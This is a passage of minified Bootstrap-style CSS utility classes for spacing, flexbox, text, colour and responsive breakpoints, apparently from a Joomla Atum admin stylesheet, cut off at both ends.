ottom:1.5rem!important}.pb-5{padding-bottom:3rem!important}.ps-1{padding-left:.25rem!important}.ps-2{padding-left:.5rem!important}.ps-3{padding-left:1rem!important}.ps-4{padding-left:1.5rem!important}.ps-5{padding-left:3rem!important}.font-monospace{font-family:var(--font-monospace)!important}.fs-1{font-size:calc(1.29rem + .48vw)!important}.fs-2{font-size:calc(1.275rem + .3vw)!important}.fs-3{font-size:1.25rem!important}.fs-4{font-size:1rem!important}.fs-5{font-size:.9286rem!important}.fs-6{font-size:.8571rem!important}.fst-italic{font-style:italic!important}.fst-normal{font-style:normal!important}.fw-light{font-weight:300!important}.fw-lighter{font-weight:lighter!important}.fw-normal{font-weight:400!important}.fw-bold{font-weight:700!important}.fw-bolder{font-weight:bolder!important}.lh-1{line-height:1!important}.lh-sm{line-height:1.25!important}.lh-base{line-height:1.5!important}.lh-lg{line-height:2!important}.text-start{text-align:left!important}.text-end{text-align:right!important}.text-center{text-align:center!important}.text-decoration-none{text-decoration:none!important}.text-decoration-underline{text-decoration:underline!important}.text-decoration-line-through{text-decoration:line-through!important}.text-lowercase{text-transform:lowercase!important}.text-uppercase{text-transform:uppercase!important}.text-capitalize{text-transform:capitalize!important}.text-wrap{white-space:normal!important}.text-nowrap{white-space:nowrap!important}.text-break{word-wrap:break-word!important;word-break:break-word!important}.text-primary{color:#132f53!important}.text-secondary{color:#495057!important}.text-success{color:#457d54!important}.text-info{color:#2a69b8!important}.text-warning{color:#ffb514!important}.text-danger{color:#c52827!important}.text-light{color:#f8f9fa!important}.text-dark{color:#212529!important}.text-atum-link-color{color:#2a69b8!important}.text-atum-text-dark{color:#495057!important}.text-action{color:#132f53!important}.text-error{color:#3b0d0c!important}.text-alert-success{color:#0f2f21!important}.text-white{color:#fff!important}.text-body{color:var(--template-text-dark)!important}.text-muted{color:#666e76!important}.text-black-50{color:rgba(0,0,0,.5)!important}.text-white-50{color:hsla(0,0%,100%,.5)!important}.text-reset{color:inherit!important}.bg-primary{background-color:#132f53!important}.bg-secondary{background-color:#495057!important}.bg-success{background-color:#457d54!important}.bg-info{background-color:#2a69b8!important}.bg-warning{background-color:#ffb514!important}.bg-danger{background-color:#c52827!important}.bg-light{background-color:#f8f9fa!important}.bg-dark{background-color:#212529!important}.bg-atum-link-color{background-color:#2a69b8!important}.bg-atum-text-dark{background-color:#495057!important}.bg-action{background-color:#132f53!important}.bg-error{background-color:#3b0d0c!important}.bg-alert-success{background-color:#0f2f21!important}.bg-body,.bg-white{background-color:#fff!important}.bg-transparent{background-color:transparent!important}.bg-gradient{background-image:var(--gradient)!important}.user-select-all{-webkit-user-select:all!important;-moz-user-select:all!important;-ms-user-select:all!important;user-select:all!important}.user-select-auto{-webkit-user-select:auto!important;-moz-user-select:auto!important;-ms-user-select:auto!important;user-select:auto!important}.user-select-none{-webkit-user-select:none!important;-moz-user-select:none!important;-ms-user-select:none!important;user-select:none!important}.pe-none{pointer-events:none!important}.pe-auto{pointer-events:auto!important}.rounded{border-radius:.25rem!important}.rounded-0{border-radius:0!important}.rounded-1{border-radius:.2rem!important}.rounded-2{border-radius:.25rem!important}.rounded-3{border-radius:.3rem!important}.rounded-circle{border-radius:50%!important}.rounded-pill{border-radius:50rem!important}.rounded-top{border-top-left-radius:.25rem!important}.rounded-end,.rounded-top{border-top-right-radius:.25rem!important}.rounded-bottom,.rounded-end{border-bottom-right-radius:.25rem!important}.rounded-bottom,.rounded-start{border-bottom-left-radius:.25rem!important}.rounded-start{border-top-left-radius:.25rem!important}.visible{visibility:visible!important}.invisible{visibility:hidden!important}@media (min-width:576px){.float-sm-start{float:left!important}.float-sm-end{float:right!important}.float-sm-none{float:none!important}.d-sm-inline{display:inline!important}.d-sm-inline-block{display:inline-block!important}.d-sm-block{display:block!important}.d-sm-grid{display:grid!important}.d-sm-table{display:table!important}.d-sm-table-row{display:table-row!important}.d-sm-table-cell{display:table-cell!important}.d-sm-flex{display:flex!important}.d-sm-inline-flex{display:inline-flex!important}.d-sm-none{display:none!important}.flex-sm-fill{flex:1 1 auto!important}.flex-sm-row{flex-direction:row!important}.flex-sm-column{flex-direction:column!important}.flex-sm-row-reverse{flex-direction:row-reverse!important}.flex-sm-column-reverse{flex-direction:column-reverse!important}.flex-sm-grow-0{flex-grow:0!important}.flex-sm-grow-1{flex-grow:1!important}.flex-sm-shrink-0{flex-shrink:0!important}.flex-sm-shrink-1{flex-shrink:1!important}.flex-sm-wrap{flex-wrap:wrap!important}.flex-sm-nowrap{flex-wrap:nowrap!important}.flex-sm-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-sm-0{gap:0!important}.gap-sm-1{gap:.25rem!important}.gap-sm-2{gap:.5rem!important}.gap-sm-3{gap:1rem!important}.gap-sm-4{gap:1.5rem!important}.gap-sm-5{gap:3rem!important}.justify-content-sm-start{justify-content:flex-start!important}.justify-content-sm-end{justify-content:flex-end!important}.justify-content-sm-center{justify-content:center!important}.justify-content-sm-between{justify-content:space-between!important}.justify-content-sm-around{justify-content:space-around!important}.justify-content-sm-evenly{justify-content:space-evenly!important}.align-items-sm-start{align-items:flex-start!important}.align-items-sm-end{align-items:flex-end!important}.align-items-sm-center{align-items:center!important}.align-items-sm-baseline{align-items:baseline!important}.align-items-sm-stretch{align-items:stretch!important}.align-content-sm-start{align-content:flex-start!important}.align-content-sm-end{align-content:flex-end!important}.align-content-sm-center{align-content:center!important}.align-content-sm-between{align-content:space-between!important}.align-content-sm-around{align-content:space-around!important}.align-content-sm-stretch{align-content:stretch!important}.align-self-sm-auto{align-self:auto!important}.align-self-sm-start{align-self:flex-start!important}.align-self-sm-end{align-self:flex-end!important}.align-self-sm-center{align-self:center!important}.align-self-sm-baseline{align-self:baseline!important}.align-self-sm-stretch{align-self:stretch!important}.order-sm-first{order:-1!important}.order-sm-0{order:0!important}.order-sm-1{order:1!important}.order-sm-2{order:2!important}.order-sm-3{order:3!important}.order-sm-4{order:4!important}.order-sm-5{order:5!important}.order-sm-last{order:6!important}.m-sm-0{margin:0!important}.m-sm-1{margin:.25rem!important}.m-sm-2{margin:.5rem!important}.m-sm-3{margin:1rem!important}.m-sm-4{margin:1.5rem!important}.m-sm-5{margin:3rem!important}.m-sm-auto{margin:auto!important}.mx-sm-0{margin-right:0!important;margin-left:0!important}.mx-sm-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-sm-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-sm-3{margin-right:1rem!important;margin-left:1rem!important}.mx-sm-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-sm-5{margin-right:3rem!important;margin-left:3rem!important}.mx-sm-auto{margin-right:auto!important;margin-left:auto!important}.my-sm-0{margin-top:0!important;margin-bottom:0!important}.my-sm-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-sm-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-sm-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-sm-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-sm-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-sm-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-sm-0{margin-top:0!important}.mt-sm-1{margin-top:.25rem!important}.mt-sm-2{margin-top:.5rem!important}.mt-sm-3{margin-top:1rem!important}.mt-sm-4{margin-top:1.5rem!important}.mt-sm-5{margin-top:3rem!important}.mt-sm-auto{margin-top:auto!important}.me-sm-0{margin-right:0!important}.me-sm-1{margin-right:.25rem!important}.me-sm-2{margin-right:.5rem!important}.me-sm-3{margin-right:1rem!important}.me-sm-4{margin-right:1.5rem!important}.me-sm-5{margin-right:3rem!important}.me-sm-auto{margin-right:auto!important}.mb-sm-0{margin-bottom:0!important}.mb-sm-1{margin-bottom:.25rem!important}.mb-sm-2{margin-bottom:.5rem!important}.mb-sm-3{margin-bottom:1rem!important}.mb-sm-4{margin-bottom:1.5rem!important}.mb-sm-5{margin-bottom:3rem!important}.mb-sm-auto{margin-bottom:auto!important}.ms-sm-0{margin-left:0!important}.ms-sm-1{margin-left:.25rem!important}.ms-sm-2{margin-left:.5rem!important}.ms-sm-3{margin-left:1rem!important}.ms-sm-4{margin-left:1.5rem!important}.ms-sm-5{margin-left:3rem!important}.ms-sm-auto{margin-left:auto!important}.p-sm-0{padding:0!important}.p-sm-1{padding:.25rem!important}.p-sm-2{padding:.5rem!important}.p-sm-3{padding:1rem!important}.p-sm-4{padding:1.5rem!important}.p-sm-5{padding:3rem!important}.px-sm-0{padding-right:0!important;padding-left:0!important}.px-sm-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-sm-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-sm-3{padding-right:1rem!important;padding-left:1rem!important}.px-sm-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-sm-5{padding-right:3rem!important;padding-left:3rem!important}.py-sm-0{padding-top:0!important;padding-bottom:0!important}.py-sm-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-sm-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-sm-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-sm-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-sm-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-sm-0{padding-top:0!important}.pt-sm-1{padding-top:.25rem!important}.pt-sm-2{padding-top:.5rem!important}.pt-sm-3{padding-top:1rem!important}.pt-sm-4{padding-top:1.5rem!important}.pt-sm-5{padding-top:3rem!important}.pe-sm-0{padding-right:0!important}.pe-sm-1{padding-right:.25rem!important}.pe-sm-2{padding-right:.5rem!important}.pe-sm-3{padding-right:1rem!important}.pe-sm-4{padding-right:1.5rem!important}.pe-sm-5{padding-right:3rem!important}.pb-sm-0{padding-bottom:0!important}.pb-sm-1{padding-bottom:.25rem!important}.pb-sm-2{padding-bottom:.5rem!important}.pb-sm-3{padding-bottom:1rem!important}.pb-sm-4{padding-bottom:1.5rem!important}.pb-sm-5{padding-bottom:3rem!important}.ps-sm-0{padding-left:0!important}.ps-sm-1{padding-left:.25rem!important}.ps-sm-2{padding-left:.5rem!important}.ps-sm-3{padding-left:1rem!important}.ps-sm-4{padding-left:1.5rem!important}.ps-sm-5{padding-left:3rem!important}.text-sm-start{text-align:left!important}.text-sm-end{text-align:right!important}.text-sm-center{text-align:center!important}}@media (min-width:768px){.float-md-start{float:left!important}.float-md-end{float:right!important}.float-md-none{float:none!important}.d-md-inline{display:inline!important}.d-md-inline-block{display:inline-block!important}.d-md-block{display:block!important}.d-md-grid{display:grid!important}.d-md-table{display:table!important}.d-md-table-row{display:table-row!important}.d-md-table-cell{display:table-cell!important}.d-md-flex{display:flex!important}.d-md-inline-flex{display:inline-flex!important}.d-md-none{display:none!important}.flex-md-fill{flex:1 1 auto!important}.flex-md-row{flex-direction:row!important}.flex-md-column{flex-direction:column!important}.flex-md-row-reverse{flex-direction:row-reverse!important}.flex-md-column-reverse{flex-direction:column-reverse!important}.flex-md-grow-0{flex-grow:0!important}.flex-md-grow-1{flex-grow:1!important}.flex-md-shrink-0{flex-shrink:0!important}.flex-md-shrink-1{flex-shrink:1!important}.flex-md-wrap{flex-wrap:wrap!important}.flex-md-nowrap{flex-wrap:nowrap!important}.flex-md-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-md-0{gap:0!important}.gap-md-1{gap:.25rem!important}.gap-md-2{gap:.5rem!important}.gap-md-3{gap:1rem!important}.gap-md-4{gap:1.5rem!important}.gap-md-5{gap:3rem!important}.justify-content-md-start{justify-content:flex-start!important}.justify-content-md-end{justify-content:flex-end!important}.justify-content-md-center{justify-content:center!important}.justify-content-md-between{justify-content:space-between!important}.justify-content-md-around{justify-content:space-around!important}.justify-content-md-evenly{justify-content:space-evenly!important}.align-items-md-start{align-items:flex-start!important}.align-items-md-end{align-items:flex-end!important}.align-items-md-center{align-items:center!important}.align-items-md-baseline{align-items:baseline!important}.align-items-md-stretch{align-items:stretch!important}.align-content-md-start{align-content:flex-start!important}.align-content-md-end{align-content:flex-end!important}.align-content-md-center{align-content:center!important}.align-content-md-between{align-content:space-between!important}.align-content-md-around{align-content:space-around!important}.align-content-md-stretch{align-content:stretch!important}.align-self-md-auto{align-self:auto!important}.align-self-md-start{align-self:flex-start!important}.align-self-md-end{align-self:flex-end!important}.align-self-md-center{align-self:center!important}.align-self-md-baseline{align-self:baseline!important}.align-self-md-stretch{align-self:stretch!important}.order-md-first{order:-1!important}.order-md-0{order:0!important}.order-md-1{order:1!important}.order-md-2{order:2!important}.order-md-3{order:3!important}.order-md-4{order:4!important}.order-md-5{order:5!important}.order-md-last{order:6!important}.m-md-0{margin:0!important}.m-md-1{margin:.25rem!important}.m-md-2{margin:.5rem!important}.m-md-3{margin:1rem!important}.m-md-4{margin:1.5rem!important}.m-md-5{margin:3rem!important}.m-md-auto{margin:auto!important}.mx-md-0{margin-right:0!important;margin-left:0!important}.mx-md-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-md-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-md-3{margin-right:1rem!important;margin-left:1rem!important}.mx-md-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-md-5{margin-right:3rem!important;margin-left:3rem!important}.mx-md-auto{margin-right:auto!important;margin-left:auto!important}.my-md-0{margin-top:0!important;margin-bottom:0!important}.my-md-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-md-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-md-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-md-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-md-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-md-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-md-0{margin-top:0!important}.mt-md-1{margin-top:.25rem!important}.mt-md-2{margin-top:.5rem!important}.mt-md-3{margin-top:1rem!important}.mt-md-4{margin-top:1.5rem!important}.mt-md-5{margin-top:3rem!important}.mt-md-auto{margin-top:auto!important}.me-md-0{margin-right:0!important}.me-md-1{margin-right:.25rem!important}.me-md-2{margin-right:.5rem!important}.me-md-3{margin-right:1rem!important}.me-md-4{margin-right:1.5rem!important}.me-md-5{margin-right:3rem!important}.me-md-auto{margin-right:auto!important}.mb-md-0{margin-bottom:0!important}.mb-md-1{margin-bottom:.25rem!important}.mb-md-2{margin-bottom:.5rem!important}.mb-md-3{margin-bottom:1rem!important}.mb-md-4{margin-bottom:1.5rem!important}.mb-md-5{margin-bottom:3rem!important}.mb-md-auto{margin-bottom:auto!important}.ms-md-0{margin-left:0!important}.ms-md-1{margin-left:.25rem!important}.ms-md-2{margin-left:.5rem!important}.ms-md-3{margin-left:1rem!important}.ms-md-4{margin-left:1.5rem!important}.ms-md-5{margin-left:3rem!important}.ms-md-auto{margin-left:auto!important}.p-md-0{padding:0!important}.p-md-1{padding:.25rem!important}.p-md-2{padding:.5rem!important}.p-md-3{padding:1rem!important}.p-md-4{padding:1.5rem!important}.p-md-5{padding:3rem!important}.px-md-0{padding-right:0!important;padding-left:0!important}.px-md-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-md-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-md-3{padding-right:1rem!important;padding-left:1rem!important}.px-md-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-md-5{padding-right:3rem!important;padding-left:3rem!important}.py-md-0{padding-top:0!important;padding-bottom:0!important}.py-md-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-md-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-md-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-md-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-md-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-md-0{padding-top:0!important}.pt-md-1{padding-top:.25rem!important}.pt-md-2{padding-top:.5rem!important}.pt-md-3{padding-top:1rem!important}.pt-md-4{padding-top:1.5rem!important}.pt-md-5{padding-top:3rem!important}.pe-md-0{padding-right:0!important}.pe-md-1{padding-right:.25rem!important}.pe-md-2{padding-right:.5rem!important}.pe-md-3{padding-right:1rem!important}.pe-md-4{padding-right:1.5rem!important}.pe-md-5{padding-right:3rem!important}.pb-md-0{padding-bottom:0!important}.pb-md-1{padding-bottom:.25rem!important}.pb-md-2{padding-bottom:.5rem!important}.pb-md-3{padding-bottom:1rem!important}.pb-md-4{padding-bottom:1.5rem!important}.pb-md-5{padding-bottom:3rem!important}.ps-md-0{padding-left:0!important}.ps-md-1{padding-left:.25rem!important}.ps-md-2{padding-left:.5rem!important}.ps-md-3{padding-left:1rem!important}.ps-md-4{padding-left:1.5rem!important}.ps-md-5{padding-left:3rem!important}.text-md-start{text-align:left!important}.text-md-end{text-align:right!important}.text-md-center{text-align:center!important}}@media (min-width:992px){.float-lg-start{float:left!important}.float-lg-end{float:right!important}.float-lg-none{float:none!important}.d-lg-inline{display:inline!important}.d-lg-inline-block{display:inline-block!important}.d-lg-block{display:block!important}.d-lg-grid{display:grid!important}.d-lg-table{display:table!important}.d-lg-table-row{display:table-row!important}.d-lg-table-cell{display:table-cell!important}.d-lg-flex{display:flex!important}.d-lg-inline-flex{display:inline-flex!important}.d-lg-none{display:none!important}.flex-lg-fill{flex:1 1 auto!important}.flex-lg-row{flex-direction:row!important}.flex-lg-column{flex-direction:column!important}.flex-lg-row-reverse{flex-direction:row-reverse!important}.flex-lg-column-reverse{flex-direction:column-reverse!important}.flex-lg-grow-0{flex-grow:0!important}.flex-lg-grow-1{flex-grow:1!important}.flex-lg-shrink-0{flex-shrink:0!important}.flex-lg-shrink-1{flex-shrink:1!important}.flex-lg-wrap{flex-wrap:wrap!important}.flex-lg-nowrap{flex-wrap:nowrap!important}.flex-lg-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-lg-0{gap:0!important}.gap-lg-1{gap:.25rem!important}.gap-lg-2{gap:.5rem!important}.gap-lg-3{gap:1rem!important}.gap-lg-4{gap:1.5rem!important}.gap-lg-5{gap:3rem!important}.justify-content-lg-start{justify-content:flex-start!important}.justify-content-lg-end{justify-content:flex-end!important}.justify-content-lg-center{justify-content:center!important}.justify-content-lg-between{justify-content:space-between!important}.justify-content-lg-around{justify-content:space-around!important}.justify-content-lg-evenly{justify-content:space-evenly!important}.align-items-lg-start{align-items:flex-start!important}.align-items-lg-end{align-items:flex-end!important}.align-items-lg-center{align-items:center!important}.align-items-lg-baseline{align-items:baseline!important}.align-items-lg-stretch{align-items:stretch!important}.align-content-lg-start{align-content:flex-start!important}.align-content-lg-end{align-content:flex-end!important}.align-content-lg-center{align-content:center!important}.align-content-lg-between{align-content:space-between!important}.align-content-lg-around{align-content:space-around!important}.align-content-lg-stretch{align-content:stretch!important}.align-self-lg-auto{align-self:auto!important}.align-self-lg-start{align-self:flex-start!important}.align-self-lg-end{align-self:flex-end!important}.align-self-lg-center{align-self:center!important}.align-self-lg-baseline{align-self:baseline!important}.align-self-lg-stretch{align-self:stretch!important}.order-lg-first{order:-1!important}.order-lg-0{order:0!important}.order-lg-1{order:1!important}.order-lg-2{order:2!important}.order-lg-3{order:3!important}.order-lg-4{order:4!important}.order-lg-5{order:5!important}.order-lg-last{order:6!important}.m-lg-0{margin:0!important}.m-lg-1{margin:.25rem!important}.m-lg-2{margin:.5rem!important}.m-lg-3{margin:1rem!important}.m-lg-4{margin:1.5rem!important}.m-lg-5{margin:3rem!important}.m-lg-auto{margin:auto!important}.mx-lg-0{margin-right:0!important;margin-left:0!important}.mx-lg-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-lg-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-lg-3{margin-right:1rem!important;margin-left:1rem!important}.mx-lg-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-lg-5{margin-right:3rem!important;margin-left:3rem!important}.mx-lg-auto{margin-right:auto!important;margin-left:auto!important}.my-lg-0{margin-top:0!important;margin-bottom:0!important}.my-lg-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-lg-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-lg-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-lg-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-lg-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-lg-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-lg-0{margin-top:0!important}.mt-lg-1{margin-top:.25rem!important}.mt-lg-2{margin-top:.5rem!important}.mt-lg-3{margin-top:1rem!important}.mt-lg-4{margin-top:1.5rem!important}.mt-lg-5{margin-top:3rem!important}.mt-lg-auto{margin-top:auto!important}.me-lg-0{margin-right:0!important}.me-lg-1{margin-right:.25rem!important}.me-lg-2{margin-right:.5rem!important}.me-lg-3{margin-right:1rem!important}.me-lg-4{margin-right:1.5rem!important}.me-lg-5{margin-right:3rem!important}.me-lg-auto{margin-right:auto!important}.mb-lg-0{margin-bottom:0!important}.mb-lg-1{margin-bottom:.25rem!important}.mb-lg-2{margin-bottom:.5rem!important}.mb-lg-3{margin-bottom:1rem!important}.mb-lg-4{margin-bottom:1.5rem!important}.mb-lg-5{margin-bottom:3rem!important}.mb-lg-auto{margin-bottom:auto!important}.ms-lg-0{margin-left:0!important}.ms-lg-1{margin-left:.25rem!important}.ms-lg-2{margin-left:.5rem!important}.ms-lg-3{margin-left:1rem!important}.ms-lg-4{margin-left:1.5rem!important}.ms-lg-5{margin-left:3rem!important}.ms-lg-auto{margin-left:auto!important}.p-lg-0{padding:0!important}.p-lg-1{padding:.25rem!important}.p-lg-2{padding:.5rem!important}.p-lg-3{padding:1rem!important}.p-lg-4{padding:1.5rem!important}.p-lg-5{padding:3rem!important}.px-lg-0{padding-right:0!important;padding-left:0!important}.px-lg-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-lg-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-lg-3{padding-right:1rem!important;padding-left:1rem!important}.px-lg-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-lg-5{padding-right:3rem!important;padding-left:3rem!important}.py-lg-0{padding-top:0!important;padding-bottom:0!important}.py-lg-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-lg-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-lg-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-lg-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-lg-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-lg-0{padding-top:0!important}.pt-lg-1{padding-top:.25rem!important}.pt-lg-2{padding-top:.5rem!important}.pt-lg-3{padding-top:1rem!important}.pt-lg-4{padding-top:1.5rem!important}.pt-lg-5{padding-top:3rem!important}.pe-lg-0{padding-right:0!important}.pe-lg-1{padding-right:.25rem!important}.pe-lg-2{padding-right:.5rem!important}.pe-lg-3{padding-right:1rem!important}.pe-lg-4{padding-right:1.5rem!important}.pe-lg-5{padding-right:3rem!important}.pb-lg-0{padding-bottom:0!important}.pb-lg-1{padding-bottom:.25rem!important}.pb-lg-2{padding-bottom:.5rem!important}.pb-lg-3{padding-bottom:1rem!important}.pb-lg-4{padding-bottom:1.5rem!important}.pb-lg-5{padding-bottom:3rem!important}.ps-lg-0{padding-left:0!important}.ps-lg-1{padding-left:.25rem!important}.ps-lg-2{padding-left:.5rem!important}.ps-lg-3{padding-left:1rem!important}.ps-lg-4{padding-left:1.5rem!important}.ps-lg-5{padding-left:3rem!important}.text-lg-start{text-align:left!important}.text-lg-end{text-align:right!important}.text-lg-center{text-align:center!important}}@media (min-width:1200px){.float-xl-start{float:left!important}.float-xl-end{float:right!important}.float-xl-none{float:none!important}.d-xl-inline{display:inline!important}.d-xl-inline-block{display:inline-block!important}.d-xl-block{display:block!important}.d-xl-grid{display:grid!important}.d-xl-table{display:table!important}.d-xl-table-row{display:table-row!important}.d-xl-table-cell{display:table-cell!important}.d-xl-flex{display:flex!important}.d-xl-inline-flex{display:inline-flex!important}.d-xl-none{display:none!important}.flex-xl-fill{flex:1 1 auto!important}.flex-xl-row{flex-direction:row!important}.flex-xl-column{flex-direction:column!important}.flex-xl-row-reverse{flex-direction:row-reverse!important}.flex-xl-column-reverse{flex-direction:column-reverse!important}.flex-xl-grow-0{flex-grow:0!important}.flex-xl-grow-1{flex-grow:1!important}.flex-xl-shrink-0{flex-shrink:0!important}.flex-xl-shrink-1{flex-shrink:1!important}.flex-xl-wrap{flex-wrap:wrap!important}.flex-xl-nowrap{flex-wrap:nowrap!important}.flex-xl-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-xl-0{gap:0!important}.gap-xl-1{gap:.25rem!important}.gap-xl-2{gap:.5rem!important}.gap-xl-3{gap:1rem!important}.gap-xl-4{gap:1.5rem!important}.gap-xl-5{gap:3rem!important}.justify-content-xl-start{justify-content:flex-start!important}.justify-content-xl-end{justify-content:flex-end!important}.justify-content-xl-center{justify-content:center!important}.justify-content-xl-between{justify-content:space-between!important}.justify-content-xl-around{justify-content:space-around!important}.justify-content-xl-evenly{justify-content:space-evenly!important}.align-items-xl-start{align-items:flex-start!important}.align-items-xl-end{align-items:flex-end!important}.align-items-xl-center{align-items:center!important}.align-items-xl-baseline{align-items:baseline!important}.align-items-xl-stretch{align-items:stretch!important}.align-content-xl-start{align-content:flex-start!important}.align-content-xl-end{align-content:flex-end!important}.align-content-xl-center{align-content:center!important}.align-content-xl-between{align-content:space-between!important}.align-content-xl-around{align-content:space-around!important}.align-content-xl-stretch{align-content:stretch!important}.align-self-xl-auto{align-self:auto!important}.align-self-xl-start{align-self:flex-start!important}.align-self-xl-end{align-self:flex-end!important}.align-self-xl-center{align-self:center!important}.align-self-xl-baseline{align-self:baseline!important}.align-self-xl-stretch{align-self:stretch!important}.order-xl-first{order:-1!important}.order-xl-0{order:0!important}.order-xl-1{order:1!important}.order-xl-2{order:2!important}.order-xl-3{order:3!important}.order-xl-4{order:4!important}.order-xl-5{order:5!important}.order-xl-last{order:6!important}.m-xl-0{margin:0!important}.m-xl-1{margin:.25rem!important}.m-xl-2{margin:.5rem!important}.m-xl-3{margin:1rem!important}.m-xl-4{margin:1.5rem!important}.m-xl-5{margin:3rem!important}.m-xl-auto{margin:auto!important}.mx-xl-0{margin-right:0!important;margin-left:0!important}.mx-xl-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-xl-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-xl-3{margin-right:1rem!important;margin-left:1rem!important}.mx-xl-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-xl-5{margin-right:3rem!important;margin-left:3rem!important}.mx-xl-auto{margin-right:auto!important;margin-left:auto!important}.my-xl-0{margin-top:0!important;margin-bottom:0!important}.my-xl-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-xl-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-xl-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-xl-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-xl-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-xl-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-xl-0{margin-top:0!important}.mt-xl-1{margin-top:.25rem!important}.mt-xl-2{margin-top:.5rem!important}.mt-xl-3{margin-top:1rem!important}.mt-xl-4{margin-top:1.5rem!important}.mt-xl-5{margin-top:3rem!important}.mt-xl-auto{margin-top:auto!important}.me-xl-0{margin-right:0!important}.me-xl-1{margin-right:.25rem!important}.me-xl-2{margin-right:.5rem!important}.me-xl-3{margin-right:1rem!important}.me-xl-4{margin-right:1.5rem!important}.me-xl-5{margin-right:3rem!important}.me-xl-auto{margin-right:auto!important}.mb-xl-0{margin-bottom:0!important}.mb-xl-1{margin-bottom:.25rem!important}.mb-xl-2{margin-bottom:.5rem!important}.mb-xl-3{margin-bottom:1rem!important}.mb-xl-4{margin-bottom:1.5rem!important}.mb-xl-5{margin-bottom:3rem!important}.mb-xl-auto{margin-bottom:auto!important}.ms-xl-0{margin-left:0!important}.ms-xl-1{margin-left:.25rem!important}.ms-xl-2{margin-left:.5rem!important}.ms-xl-3{margin-left:1rem!important}.ms-xl-4{margin-left:1.5rem!important}.ms-xl-5{margin-left:3rem!important}.ms-xl-auto{margin-left:auto!important}.p-xl-0{padding:0!important}.p-xl-1{padding:.25rem!important}.p-xl-2{padding:.5rem!important}.p-xl-3{padding:1rem!important}.p-xl-4{padding:1.5rem!important}.p-xl-5{padding:3rem!important}.px-xl-0{padding-right:0!important;padding-left:0!important}.px-xl-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-xl-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-xl-3{padding-right:1rem!important;padding-left:1rem!important}.px-xl-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-xl-5{padding-right:3rem!important;padding-left:3rem!important}.py-xl-0{padding-top:0!important;padding-bottom:0!important}.py-xl-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-xl-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-xl-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-xl-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-xl-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-xl-0{padding-top:0!important}.pt-xl-1{padding-top:.25rem!important}.pt-xl-2{padding-top:.5rem!important}.pt-xl-3{padding-top:1rem!important}.pt-xl-4{padding-top:1.5rem!important}.pt-xl-5{padding-top:3rem!important}.pe-xl-0{padding-right:0!important}.pe-xl-1{padding-right:.25rem!important}.pe-xl-2{padding-right:.5rem!important}.pe-xl-3{padding-right:1rem!important}.pe-xl-4{padding-right:1.5rem!important}.pe-xl-5{padding-right:3rem!important}.pb-xl-0{padding-bottom:0!important}.pb-xl-1{padding-bottom:.25rem!important}.pb-xl-2{padding-bottom:.5rem!important}.pb-xl-3{pad